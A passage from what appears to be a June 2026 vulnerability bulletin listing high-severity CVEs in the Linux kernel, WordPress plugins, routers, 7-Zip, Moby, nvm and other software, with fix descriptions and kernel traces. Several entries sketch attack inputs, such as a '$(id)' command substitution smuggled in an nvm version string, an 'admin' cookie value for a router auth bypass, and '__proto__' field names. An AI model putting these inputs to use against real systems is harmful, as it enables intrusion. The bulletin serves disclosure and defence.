0.000000] $ 4 : ffffffff80b80ec0 ffffffff80b53d48 0000000000000000 00000000000f4240 [ 0.000000] $ 8 : 0000000000000100 ffffffff81d82f80 ffffffff81d82f80 0000000000000001 [ 0.000000] $12 : 0000000000000000 ffffffff81776f58 00000000000005da 0000000000000002 [ 0.000000] $16 : ffffffff80b80e40 0000000000000000 ffffffff80b81614 9800000005dfbe80 [ 0.000000] $20 : 00000000540000e0 ffffffff81980000 0000000000000000 ffffffff80f81c80 [ 0.000000] $24 : 0000000000000a26 ffffffff8114fb90 [ 0.000000] $28 : ffffffff80b50000 ffffffff80b53d40 0000000000000000 ffffffff81afad90 [ 0.000000] Hi : 0000000000000000 [ 0.000000] Lo : 0000000000000000 [ 0.000000] epc : ffffffff81afada8 init_idle+0x130/0x270 [ 0.000000] ra : ffffffff81afad90 init_idle+0x118/0x270 [ 0.000000] Status: 540000e2 KX SX UX KERNEL EXL [ 0.000000] Cause : 00000008 (ExcCode 02) [ 0.000000] BadVA : 0000000000000000 [ 0.000000] PrId : 00006305 (ICT Loongson-3) [ 0.000000] Process swapper (pid: 0, threadinfo=(____ptrval____), task=(____ptrval____), tls=0000000000000000) [ 0.000000] Stack : 9800000005dfbf00 ffffffff8178e950 0000000000000000 0000000000000000 [ 0.000000] 0000000000000000 ffffffff81970000 000000000000003f ffffffff810a6528 [ 0.000000] 0000000000000001 9800000005dfbe80 9800000005dfbf00 ffffffff81980000 [ 0.000000] ffffffff810a6450 ffffffff81afb6c0 0000000000000000 ffffffff810a2258 [ 0.000000] ffffffff81d82ec8 ffffffff8198d010 ffffffff81b67e80 ffffffff8197dd98 [ 0.000000] ffffffff81d81c80 ffffffff81930000 0000000000000040 0000000000000000 [ 0.000000] 0000000000000000 0000000000000000 0000000000000000 0000000000000000 [ 0.000000] 0000000000000000 000000000000009e ffffffff9fc01000 0000000000000000 [ 0.000000] 0000000000000000 0000000000000000 0000000000000000 0000000000000000 [ 0.000000] 0000000000000000 ffffffff81ae86dc ffffffff81b3c741 0000000000000002 [ 0.000000] ... [ 0.000000] Call Trace: [ 0.000000] [<ffffffff81afada8>] init_idle+0x130/0x270 [ 0.000000] [<ffffffff81afb6c0>] sched_init+0x5c8/0x6c0 [ 0.000000] [<ffffffff81ae86dc>] start_kernel+0x27c/0x7a8 This bug has been reported to LLVM[2] and affects version from (at least) 18 to 21. Let's work around this by using inline assembly to assign $gp before a fix is widely available. | 2026-06-03 | 7.3 | CVE-2026-46250 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: pstore/ram: fix buffer overflow in persistent_ram_save_old() persistent_ram_save_old() can be called multiple times for the same persistent_ram_zone (e.g., via ramoops_pstore_read -> ramoops_get_next_prz for PSTORE_TYPE_DMESG records). Currently, the function only allocates prz->old_log when it is NULL, but it unconditionally updates prz->old_log_size to the current buffer size and then performs memcpy_fromio() using this new size. If the buffer size has grown since the first allocation (which can happen across different kernel boot cycles), this leads to: 1. A heap buffer overflow (OOB write) in the memcpy_fromio() calls 2. A subsequent OOB read when ramoops_pstore_read() accesses the buffer using the incorrect (larger) old_log_size The KASAN splat would look similar to: BUG: KASAN: slab-out-of-bounds in ramoops_pstore_read+0x... Read of size N at addr ... by task ... The conditions are likely extremely hard to hit: 0. Crash with a ramoops write of less-than-record-max-size bytes. 1. Reboot: ramoops registers, pstore_get_records(0) reads old crash, allocates old_log with size X 2. Crash handler registered, timer started (if pstore_update_ms >= 0) 3. Oops happens (non-fatal, system continues) 4. pstore_dump() writes oops via ramoops_pstore_write() size Y (>X) 5. pstore_new_entry = 1, pstore_timer_kick() called 6. System continues running (not a panic oops) 7. Timer fires after pstore_update_ms milliseconds 8. pstore_timefunc() → schedule_work() → pstore_dowork() → pstore_get_records(1) 9. ramoops_get_next_prz() → persistent_ram_save_old() 10. buffer_size() returns Y, but old_log is X bytes 11. Y > X: memcpy_fromio() overflows heap Requirements: - a prior crash record exists that did not fill the record size (almost impossible since the crash handler writes as much as it can possibly fit into the record, capped by max record size and the kmsg buffer almost always exceeds the max record size) - pstore_update_ms >= 0 (disabled by default) - Non-fatal oops (system survives) Free and reallocate the buffer when the new size differs from the previously allocated size. This ensures old_log always has sufficient space for the data being copied. | 2026-06-03 | 7.8 | CVE-2026-46253 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: procfs: fix missing RCU protection when reading real_parent in do_task_stat() When reading /proc/[pid]/stat, do_task_stat() accesses task->real_parent without proper RCU protection, which leads to: cpu 0 cpu 1 ----- ----- do_task_stat var = task->real_parent release_task call_rcu(delayed_put_task_struct) task_tgid_nr_ns(var) rcu_read_lock <--- Too late to protect task->real_parent! task_pid_ptr <--- UAF! rcu_read_unlock This patch uses task_ppid_nr_ns() instead of task_tgid_nr_ns() to add proper RCU protection for accessing task->real_parent. | 2026-06-03 | 7.8 | CVE-2026-46259 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipv6: Fix out-of-bound access in fib6_add_rt2node(). syzbot reported out-of-bound read in fib6_add_rt2node(). [0] When IPv6 route is created with RTA_NH_ID, struct fib6_info does not have the trailing struct fib6_nh. The cited commit started to check !iter->fib6_nh->fib_nh_gw_family to ensure that rt6_qualify_for_ecmp() will return false for iter. If iter->nh is not NULL, rt6_qualify_for_ecmp() returns false anyway. Let's check iter->nh before reading iter->fib6_nh and avoid OOB read. [0]: BUG: KASAN: slab-out-of-bounds in fib6_add_rt2node+0x349c/0x3500 net/ipv6/ip6_fib.c:1142 Read of size 1 at addr ffff8880384ba6de by task syz.0.18/5500 CPU: 0 UID: 0 PID: 5500 Comm: syz.0.18 Not tainted syzkaller #0 PREEMPT(full) Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2 04/01/2014 Call Trace: <TASK> dump_stack_lvl+0xe8/0x150 lib/dump_stack.c:120 print_address_description mm/kasan/report.c:378 [inline] print_report+0xba/0x230 mm/kasan/report.c:482 kasan_report+0x117/0x150 mm/kasan/report.c:595 fib6_add_rt2node+0x349c/0x3500 net/ipv6/ip6_fib.c:1142 fib6_add_rt2node_nh net/ipv6/ip6_fib.c:1363 [inline] fib6_add+0x910/0x18c0 net/ipv6/ip6_fib.c:1531 __ip6_ins_rt net/ipv6/route.c:1351 [inline] ip6_route_add+0xde/0x1b0 net/ipv6/route.c:3957 inet6_rtm_newroute+0x268/0x19e0 net/ipv6/route.c:5660 rtnetlink_rcv_msg+0x7d5/0xbe0 net/core/rtnetlink.c:6958 netlink_rcv_skb+0x232/0x4b0 net/netlink/af_netlink.c:2550 netlink_unicast_kernel net/netlink/af_netlink.c:1318 [inline] netlink_unicast+0x80f/0x9b0 net/netlink/af_netlink.c:1344 netlink_sendmsg+0x813/0xb40 net/netlink/af_netlink.c:1894 sock_sendmsg_nosec net/socket.c:727 [inline] __sock_sendmsg net/socket.c:742 [inline] ____sys_sendmsg+0xa68/0xad0 net/socket.c:2592 ___sys_sendmsg+0x2a5/0x360 net/socket.c:2646 __sys_sendmsg net/socket.c:2678 [inline] __do_sys_sendmsg net/socket.c:2683 [inline] __se_sys_sendmsg net/socket.c:2681 [inline] __x64_sys_sendmsg+0x1bd/0x2a0 net/socket.c:2681 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xe2/0xf80 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f9316b9aeb9 Code: ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 e8 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007ffd8809b678 EFLAGS: 00000246 ORIG_RAX: 000000000000002e RAX: ffffffffffffffda RBX: 00007f9316e15fa0 RCX: 00007f9316b9aeb9 RDX: 0000000000000000 RSI: 0000200000004380 RDI: 0000000000000003 RBP: 00007f9316c08c1f R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000 R13: 00007f9316e15fac R14: 00007f9316e15fa0 R15: 00007f9316e15fa0 </TASK> Allocated by task 5499: kasan_save_stack mm/kasan/common.c:57 [inline] kasan_save_track+0x3e/0x80 mm/kasan/common.c:78 poison_kmalloc_redzone mm/kasan/common.c:398 [inline] __kasan_kmalloc+0x93/0xb0 mm/kasan/common.c:415 kasan_kmalloc include/linux/kasan.h:263 [inline] __do_kmalloc_node mm/slub.c:5657 [inline] __kmalloc_noprof+0x40c/0x7e0 mm/slub.c:5669 kmalloc_noprof include/linux/slab.h:961 [inline] kzalloc_noprof include/linux/slab.h:1094 [inline] fib6_info_alloc+0x30/0xf0 net/ipv6/ip6_fib.c:155 ip6_route_info_create+0x142/0x860 net/ipv6/route.c:3820 ip6_route_add+0x49/0x1b0 net/ipv6/route.c:3949 inet6_rtm_newroute+0x268/0x19e0 net/ipv6/route.c:5660 rtnetlink_rcv_msg+0x7d5/0xbe0 net/core/rtnetlink.c:6958 netlink_rcv_skb+0x232/0x4b0 net/netlink/af_netlink.c:2550 netlink_unicast_kernel net/netlink/af_netlink.c:1318 [inline] netlink_unicast+0x80f/0x9b0 net/netlink/af_netlink.c:1344 netlink_sendmsg+0x813/0xb40 net/netlink/af_netlink.c:1894 sock_sendmsg_nosec net/socket.c:727 [inline] __sock_sendmsg net/socket.c:742 [inline] ____sys_sendmsg+0xa68/0xad0 net/socket.c:2592 ___sys_s ---truncated--- | 2026-06-03 | 7.8 | CVE-2026-46260 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Fix out-of-bounds stream encoder index v3 eng_id can be negative and that stream_enc_regs[] can be indexed out of bounds. eng_id is used directly as an index into stream_enc_regs[], which has only 5 entries. When eng_id is 5 (ENGINE_ID_DIGF) or negative, this can access memory past the end of the array. Add a bounds check using ARRAY_SIZE() before using eng_id as an index. The unsigned cast also rejects negative values. This avoids out-of-bounds access. Fixes the below smatch error: dcn*_resource.c: stream_encoder_create() may index stream_enc_regs[eng_id] out of bounds (size 5). drivers/gpu/drm/amd/amdgpu/../display/dc/resource/dcn351/dcn351_resource.c 1246 static struct stream_encoder *dcn35_stream_encoder_create( 1247 enum engine_id eng_id, 1248 struct dc_context *ctx) 1249 { ... 1255 1256 /* Mapping of VPG, AFMT, DME register blocks to DIO block instance */ 1257 if (eng_id <= ENGINE_ID_DIGF) { ENGINE_ID_DIGF is 5. should <= be <? Unrelated but, ugh, why is Smatch saying that "eng_id" can be negative? end_id is type signed long, but there are checks in the caller which prevent it from being negative. 1258 vpg_inst = eng_id; 1259 afmt_inst = eng_id; 1260 } else 1261 return NULL; 1262 ... 1281 1282 dcn35_dio_stream_encoder_construct(enc1, ctx, ctx->dc_bios, 1283 eng_id, vpg, afmt, --> 1284 &stream_enc_regs[eng_id], ^^^^^^^^^^^^^^^^^^^^^^^ This stream_enc_regs[] array has 5 elements so we are one element beyond the end of the array. ... 1287 return &enc1->base; 1288 } v2: use explicit bounds check as suggested by Roman/Dan; avoid unsigned int cast v3: The compiler already knows how to compare the two values, so the cast (int) is not needed. (Roman) | 2026-06-03 | 7.8 | CVE-2026-46263 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/hns: Fix WQ_MEM_RECLAIM warning When sunrpc is used, if a reset triggered, our wq may lead the following trace: workqueue: WQ_MEM_RECLAIM xprtiod:xprt_rdma_connect_worker [rpcrdma] is flushing !WQ_MEM_RECLAIM hns_roce_irq_workq:flush_work_handle [hns_roce_hw_v2] WARNING: CPU: 0 PID: 8250 at kernel/workqueue.c:2644 check_flush_dependency+0xe0/0x144 Call trace: check_flush_dependency+0xe0/0x144 start_flush_work.constprop.0+0x1d0/0x2f0 __flush_work.isra.0+0x40/0xb0 flush_work+0x14/0x30 hns_roce_v2_destroy_qp+0xac/0x1e0 [hns_roce_hw_v2] ib_destroy_qp_user+0x9c/0x2b4 rdma_destroy_qp+0x34/0xb0 rpcrdma_ep_destroy+0x28/0xcc [rpcrdma] rpcrdma_ep_put+0x74/0xb4 [rpcrdma] rpcrdma_xprt_disconnect+0x1d8/0x260 [rpcrdma] xprt_rdma_connect_worker+0xc0/0x120 [rpcrdma] process_one_work+0x1cc/0x4d0 worker_thread+0x154/0x414 kthread+0x104/0x144 ret_from_fork+0x10/0x18 Since QP destruction frees memory, this wq should have the WQ_MEM_RECLAIM. | 2026-06-03 | 7.5 | CVE-2026-46265 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: ath12k: do WoW offloads only on primary link In case of multi-link connection, WCN7850 firmware crashes due to WoW offloads enabled on both primary and secondary links. Change to do it only on primary link to fix it. Tested-on: WCN7850 hw2.0 PCI WLAN.HMT.1.1.c5-00284-QCAHMTSWPL_V1.0_V2.0_SILICONZ-1 | 2026-06-03 | 7.8 | CVE-2026-46271 |
| Liquid Web / StellarWP--BookIt | Authentication Bypass Using an Alternate Path or Channel vulnerability in Liquid Web / StellarWP BookIt allows Password Recovery Exploitation. This issue affects BookIt: from n/a before 2.5.4.1. | 2026-06-02 | 7.5 | CVE-2026-40780 |
| Liquid Web / StellarWP--GiveWP | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Liquid Web / StellarWP GiveWP allows DOM-Based XSS. This issue affects GiveWP: from n/a through 4.14.5. | 2026-06-01 | 7.1 | CVE-2026-42678 |
| LMS Community--Lyrion Music Server | Lyrion Music Server 9.2.0 contains an unauthenticated stored cross-site scripting vulnerability in the log viewer that allows attackers to inject malicious scripts by exploiting unescaped template variables. Attackers can inject XSS payloads through search, lines, and path query parameters or by crafting values that get logged such as URLs, User-Agent headers, stream titles, or player names to execute arbitrary scripts in users' browsers. | 2026-06-05 | 7.2 | CVE-2026-50231 |
| LMS Community--Lyrion Music Server | Lyrion Music Server 9.2.0 contains a stored cross-site scripting vulnerability that allows attackers to inject malicious scripts through media file metadata tags like GENRE, ARTIST, and ALBUM. Attackers can craft files with XSS payloads in metadata tags that execute in the web interface when users view track information or play files, enabling access to management functions and settings disclosure. | 2026-06-05 | 7.2 | CVE-2026-50232 |
| LMS Community--Lyrion Music Server | Lyrion Music Server 9.2.0 contains a path traversal vulnerability that allows unauthenticated attackers to read arbitrary files by exploiting directory traversal in the web server context. Attackers can manipulate file path parameters to access sensitive files outside the intended directory structure. | 2026-06-05 | 7.5 | CVE-2026-50234 |
| Logtivity Activity Logs--Activity Logs, User Activity Tracking, Multisite Activity Log from Logtivity | Insertion of Sensitive Information Into Sent Data vulnerability in Logtivity Activity Logs Activity Logs, User Activity Tracking, Multisite Activity Log from Logtivity allows Retrieve Embedded Sensitive Data. This issue affects Activity Logs, User Activity Tracking, Multisite Activity Log from Logtivity: from n/a through 3.3.6. | 2026-06-01 | 7.5 | CVE-2026-42673 |
| masaakitanaka--Booking Package | The Booking Package plugin for WordPress is vulnerable to Privilege Escalation via Account Takeover in versions up to, and including, 1.7.16. This is due to a missing capability check on the 'updateUser' branch of the package_app_action AJAX endpoint, where the handler only validates a nonce and the dispatcher invokes Schedule::updateUser() with the $administrator argument hard-coded to 1, bypassing the only owner-restriction check inside that function and allowing the target user to be determined solely by attacker-supplied input passed directly to wp_update_user(). This makes it possible for authenticated attackers, with Editor-level access and above, to change the email address and password of any account, including Administrator accounts, resulting in a full site takeover. | 2026-06-06 | 7.2 | CVE-2026-9851 |
| maziyarpanahi--openmed | OpenMed before 1.5.2 contains a remote code execution vulnerability in the PII privacy-filter model loading path. The privacy-filter dispatcher used broad substring matching on the user-supplied model_name parameter, allowing a value such as attacker/foo-privacy-filter-bar to route through a path that loads Hugging Face models with trust_remote_code=True. An unauthenticated attacker can supply a malicious model repository containing custom Transformers code via auto_map in config.json or tokenizer_config.json, which is imported and executed with the privileges of the OpenMed service process. | 2026-06-02 | 9.8 | CVE-2026-47117 |
| MBS--Single-A | An unauthenticated remote attacker can recover a default, hard coded password from a firmware image and thus gain full access to all affected devices. | 2026-06-03 | 9.8 | CVE-2026-35075 |
| MBS--Single-A | The bac-scanresult method allows a remote attacker with user privileges to delete arbitrary local files due to insufficient validation of user-controlled input. | 2026-06-03 | 8.1 | CVE-2026-35076 |
| MBS--Single-A | The ugw-delete-file method allows a remote attacker with user privileges to delete arbitrary local files due to insufficient validation of user-controlled input. | 2026-06-03 | 8.1 | CVE-2026-35077 |
| MBS--Single-A | The ugw-logstop method allows a remote attacker with user privileges to delete arbitrary local files due to insufficient validation of user-controlled input. | 2026-06-03 | 8.1 | CVE-2026-35078 |
| MBS--Single-A | The ugw-restore method allows a remote attacker with user privileges to delete arbitrary local files due to insufficient validation of user-controlled input. | 2026-06-03 | 8.1 | CVE-2026-35079 |
| MBS--Single-A | The ugw-restoreinfo method allows a remote attacker with user privileges to delete arbitrary local files due to insufficient validation of user-controlled input. | 2026-06-03 | 8.1 | CVE-2026-35080 |
| MBS--Single-A | The ugw-logstop method allows a remote attacker with user privileges to terminate arbitrary processes due to insufficient validation of user-supplied input. | 2026-06-03 | 8.1 | CVE-2026-35081 |
| MBS--Single-A | The ugw-logread method allows a remote attacker with user privileges to access arbitrary local files due to insufficient validation of user-supplied input. | 2026-06-03 | 8.8 | CVE-2026-35082 |
| MBS--Single-A | A remote attacker with user privileges can exploit a stack buffer overflow to gain full system access as root. | 2026-06-03 | 8.8 | CVE-2026-35083 |
| MBS--Single-A | A remote attacker with user privileges can exploit a stack buffer overflow in dali-devconfig to gain full system access as root. | 2026-06-03 | 8.8 | CVE-2026-35084 |
| MBS--Single-A | A remote attacker with user privileges can exploit a stack buffer overflow in gdv-serverconfig to gain full system access as root. | 2026-06-03 | 8.8 | CVE-2026-35085 |
| mcmilk--7-Zip | 7-Zip is a file archiver with a high compression ratio. Versions 26.00 and prior contain a heap buffer overflow vulnerability caused by an under-allocation in the NTFS compressed stream buffer (GetCuSize shift UB), potentially allowing attackers to cause arbitrary code execution or application crashes. CInStream::GetCuSize() in the NTFS handler computes the compression-unit buffer size as (UInt32)1 << (BlockSizeLog + CompressionUnit), and a crafted image with ClusterSizeLog >= 28 and CompressionUnit == 4 drives the exponent to 32, which is undefined behavior and collapses on x86/x64 so _inBuf is allocated as 1 byte. ReadStream_FALSE then writes up to 256 MB of attacker-controlled data into that 1-byte buffer in 64 KB iterations, and because the CInStream object sits only 304 bytes after _inBuf, its vtable pointer is overwritten and the next dispatched call achieves a vtable hijack. On 32-bit builds the overflow is unconditionally reached; on 64-bit it requires the parallel 8 GB _outBuf allocation to succeed, otherwise failing closed to denial of service. The NTFS handler is enabled by default in stock 7z.dll and, via signature-based fallback matching "NTFS " at offset 3, will open a crafted image regardless of file extension during extraction or testing. Version 26.01 fixes the issue. | 2026-06-05 | 8.8 | CVE-2026-48095 |
| mdjm--MDJM Event Management | The MDJM Event Management plugin for WordPress is vulnerable to Arbitrary File Upload in all versions up to, and including, 1.7.8.3 via the mdjm_send_comm_email function. This is due to no file type, extension, or MIME type validation being performed on uploaded files. This makes it possible for authenticated attackers, with administrator-level access and above, to upload files that may be executable, which makes remote code execution possible. | 2026-06-06 | 7.2 | CVE-2026-7537 |
| medplum--medplum | Medplum before 5.1.14 contains a server-side request forgery vulnerability in the subscription worker that allows authenticated users to perform unauthorized internal network requests by creating FHIR Subscription resources with arbitrary endpoint URLs. Attackers can point subscription endpoints at internal addresses such as cloud instance metadata services, internal databases, or container orchestration endpoints to exfiltrate IAM credentials and patient health records via the POST body containing full FHIR resource payloads. | 2026-06-02 | 8.5 | CVE-2026-49120 |
| Microsoft--Azure HorizonDB | Authentication bypass by spoofing in Azure HorizonDB allows an unauthorized attacker to elevate privileges over a network. | 2026-06-04 | 10 | CVE-2026-48567 |
| Microsoft--Microsoft 365 Copilot | Improper neutralization of special elements used in a command ('command injection') in Microsoft Copilot allows an authorized attacker to execute code over a network. | 2026-06-04 | 7.7 | CVE-2026-45497 |
| Microsoft--Microsoft Exchange Online | Improper authorization in Microsoft Exchange Online allows an unauthorized attacker to disclose information over a network. | 2026-06-04 | 9.1 | CVE-2026-48579 |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Deserialization of untrusted data in Microsoft Office SharePoint allows an authorized attacker to execute code over a network. | 2026-06-01 | 8 | CVE-2026-47294 |
| milamer--parse-nested-form-data | parse-nested-form-data is a tiny node module for parsing FormData by name into objects and arrays. Prior to version 1.0.1, parseFormData() walks bracket and dot-notation FormData field names into nested objects without filtering reserved property keys. A single FormData field whose name begins with __proto__, or contains .__proto__. mid-path, causes the parser to traverse onto Object.prototype and assign properties there, polluting the prototype chain of every plain object in the running process. This issue has been patched in version 1.0.1. | 2026-06-01 | 8.2 | CVE-2026-45302 |
| Mobatek--Mobatek MobaXterm | Mobatek MobaXterm 12.1 contains a structured exception handling (SEH) based buffer overflow vulnerability in the username field of session files that allows remote attackers to execute arbitrary code. Attackers can craft a malicious MobaXterm sessions file with overflow data that triggers the vulnerability when imported and executed, enabling reverse shell execution with user privileges. | 2026-06-04 | 9.8 | CVE-2019-25741 |
| moby--moby/v2/daemon | Moby is an open source container framework. In versions prior to 29.5.1 and in moby/moby v2 prior to v2.0.0-beta.14, when a compressed archive is uploaded to a container via `PUT /containers/{id}/archive` or piped through `docker cp -`, the daemon resolves decompression binaries (such as `xz` or `unpigz`) from the container's filesystem rather than the host's due to incorrect ordering of operations. A malicious container image containing a trojanized decompression binary can achieve arbitrary code execution with full daemon privileges, including host root UID and unrestricted capabilities, when a user uploads a compressed (xz or gzip) archive into that container. This issue is fixed in Docker Engine 29.5.1 and moby/moby v2.0.0-beta.14. Workarounds include only running containers from trusted images, using authorization plugins to restrict access to the `PUT /containers/{id}/archive` endpoint, and avoiding piping compressed archives into containers created from untrusted images | 2026-06-05 | 7.2 | CVE-2026-41567 |
| Mojoomla--School Management | Incorrect Privilege Assignment vulnerability in Mojoomla School Management allows Privilege Escalation. This issue affects School Management: from n/a through 93.2.0. | 2026-06-03 | 8.8 | CVE-2025-15656 |
| Mojoomla--School Management | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Mojoomla School Management allows SQL Injection. This issue affects School Management: from n/a through 93.2.0. | 2026-06-03 | 7.6 | CVE-2025-15655 |
| Neterbit--NW-431F Router | Improper Authentication (Authentication Bypass) exists in Neterbit NW-431F Router 20241014-IR03 and before. The router uses a weak/predictable cookie value for authentication. By modifying the cookie value (e.g., setting it to "admin"), an attacker can bypass the authentication schema and gain unauthorized access to admin functionalities. | 2026-06-04 | 9.8 | CVE-2025-67446 |
| Neterbit--NW-431F Router | The network diagnosis (ping) module in Neterbit NW-431F Router 20241014-IR03 and before is vulnerable to OS command injection. The application does not properly sanitize user input in the IP address field before passing it to the system's ping command. An attacker can inject arbitrary OS commands, which will be executed with the privileges of the web server. | 2026-06-04 | 9.8 | CVE-2025-67447 |
| Neterbit--NW-431F Router | An issue in Neterbit NW-431F Router vNW-431F-20241014-IR03 allows a remote attacker to obtain sensitive information and execute arbitrary code via a crafted command to the at_command.asp interface | 2026-06-04 | 8.2 | CVE-2025-69755 |
| Neterbit--NW-431F Router | The SMS module in Neterbit NW-431F Router 20241014-IR03 and before is vulnerable to stored XSS. The application does not properly sanitize user input in SMS messages before storing and displaying them. An attacker can send an SMS containing a malicious XSS payload, which will be executed in the context of the victim's browser when the message is viewed. | 2026-06-04 | 7.1 | CVE-2025-67448 |
| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. From versions 0.3.0 to before 3.1.0, 5.0.0 to before 5.1.0, and 6.0.0 to before 6.4.0, a missing signature verification in User OIDC allowed a malicious ID4me authority to identify as any user. This issue has been patched in versions 3.1.0, 4.1.0, 5.1.0, 6.4.0 and 8.3.0. | 2026-06-01 | 8.1 | CVE-2026-45156 |
| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. In Nextcloud Server from versions 32.0.0 to before 32.0.9, and 33.0.0 to before 33.0.3, with the knowledge of other users' principal URL an attacker could possibly send a request to gain full access to their calendar. Therefore, the attacker must be an authenticated user. This is because of improper authorization controls in the backend of the calendar. If the attacker had access to the calendar, they would be able to view and modify it. It is recommended that the Nextcloud Server is upgraded to 33.0.3 or 32.0.9. It is recommended that the Nextcloud Enterprise Server is upgraded to 33.0.3, 32.0.9, 31.0.14.5, 30.0.17.9, 29.0.16.16, 28.0.14.17, 27.1.11.26, 26.0.13.26, 25.0.13.29, 24.0.12.34, 23.0.12.35, 22.2.10.39, or 21.0.9.23 | 2026-06-01 | 8.1 | CVE-2026-45281 |
| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. From versions 0.7.0 to before 0.7.7, 0.8.0 to before 0.8.10, 0.9.0 to before 0.9.8, and 1.0.0 to before 1.0.4, an authenticated attacker with access to the Tables app may be able to execute arbitrary up to 20 bytes long SQL queries, through a stored injection. With carefully crafted input it is possible to break out of the length limitation. The attacker could use this to extract information from the database, or modify data. This issue has been patched in versions 0.7.7, 0.8.10, 0.9.8, 1.0.4, and 2.0.0. | 2026-06-01 | 8.2 | CVE-2026-45545 |
| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. From versions 0.9.0 to before 0.9.7, and 1.0.0 to before 1.0.2, a missing sanitization in the Tables app allowed a user with access to the tables app to perform a limited SQL injection in the ORDER BY statement of a query. Compared to normal SQL injections, the ORDER BY is limited to extracting a single bit of information per request or to make the database wait for a given time. This issue has been patched in versions 0.9.7 and 1.0.2. | 2026-06-01 | 7.1 | CVE-2026-45722 |
| nextlevelbuilder--GoClaw | A vulnerability was found in nextlevelbuilder GoClaw up to 3.11.3. This impacts the function FsBridge.WriteFile of the file internal/sandbox/fsbridge.go of the component write_file Tool. Performing a manipulation results in os command injection. The attack is possible to be carried out remotely. The exploit has been made public and could be used. The pull request to fix this issue awaits acceptance. | 2026-06-01 | 7.3 | CVE-2026-10219 |
| nextlevelbuilder--GoClaw | A security vulnerability has been detected in nextlevelbuilder GoClaw up to 3.11.3. This affects the function resolveAuth of the file internal/http/auth.go of the component Webhook Verification Handler. The manipulation leads to missing authentication. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used. The project tagged the reported issue as bug. | 2026-06-02 | 7.3 | CVE-2026-10617 |
| NI--NI-PAL | Improper input validation in the NI-PAL kernel driver may allow a local authenticated user to cause a denial of service by triggering a crash due to a NULL pointer dereference. This vulnerability affects NI-PAL 26.3.0 and prior versions on Windows and Linux. | 2026-06-02 | 7.1 | CVE-2026-8035 |
| NI--NI-PAL | Improper input validation in NI-PAL may allow a local authenticated user to access arbitrary system memory, potentially leading to privilege escalation. This vulnerability affects NI-PAL 26.3.0 and prior versions on Windows and Linux. | 2026-06-02 | 7.1 | CVE-2026-8036 |
| Nicheoffice--All in One Video Downloader | All in One Video Downloader 1.2 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the id parameter. Attackers can send requests to the admin interface with UNION-based SQL injection payloads in the id parameter to extract sensitive database information including usernames, databases, and version details. | 2026-06-04 | 8.2 | CVE-2019-25726 |
| NousResearch--hermes-agent | A vulnerability was determined in NousResearch hermes-agent up to 2026.4.30. Affected is the function _serve_plugin_skill/skill_view of the file tools/skills_tool.py. Executing a manipulation can lead to injection. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-01 | 7.3 | CVE-2026-10220 |
| NousResearch--hermes-agent | A vulnerability was identified in NousResearch hermes-agent up to 0.12.0. Affected by this vulnerability is the function _compress_context of the file run_agent.py. The manipulation leads to injection. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-01 | 7.3 | CVE-2026-10221 |
| nsauditor--NetShareWatcher | NetShareWatcher 1.5.8.0 contains a structured exception handler buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying malicious input. Attackers can craft a payload with overwritten SEH and NSEH pointers through the Restrictions custom filter field to trigger code execution when the Find function is invoked. | 2026-06-04 | 8.4 | CVE-2019-25733 |
| NVIDIA--NVTabular | NVIDIA NVTabular contains a vulnerability where an attacker could cause improper deserialization of untrusted data. A successful exploit of this vulnerability might lead to code execution, data tampering and information disclosure. | 2026-06-02 | 7.8 | CVE-2026-24221 |
| NVIDIA--NVTabular | NVIDIA NVTabular contains a vulnerability where an attacker could cause improper deserialization of untrusted data. A successful exploit of this vulnerability might lead to code execution, data tampering, and information disclosure. | 2026-06-02 | 7.8 | CVE-2026-24237 |
| nvm-sh--nvm | nvm (Node Version Manager) through 0.40.4 executes arbitrary commands from version strings supplied by the configured Node.js/io.js mirror. Commands such as `nvm install` read the available versions from the mirror's index.tab and use the selected version, without sanitization, to build download URLs and shell/awk commands. Two sinks are affected by the same untrusted input: nvm_download() built a curl/wget command string and ran it with `eval`, so a version field containing command substitution (for example $(id)) was executed by the local shell; and nvm_get_checksum() interpolated the version-derived download slug into an awk program, so a crafted version could execute arbitrary commands via awk's system(). An attacker who controls the configured mirror, supplies mirror content to a user or CI on a non-default mirror, or machine-in-the-middles a non-TLS mirror can ∴ run arbitrary commands with the privileges of the user running nvm. The default mirror (https://nodejs.org over TLS) is not affected. Fixed on master (pending the next tagged release) by passing every argument as a literal argv element instead of using eval, by passing the value to awk as data via -v instead of interpolating it into the program, and by rejecting any version outside the Node.js/io.js version grammar before it is used. | 2026-06-04 | 7.5 | CVE-2026-10796 |
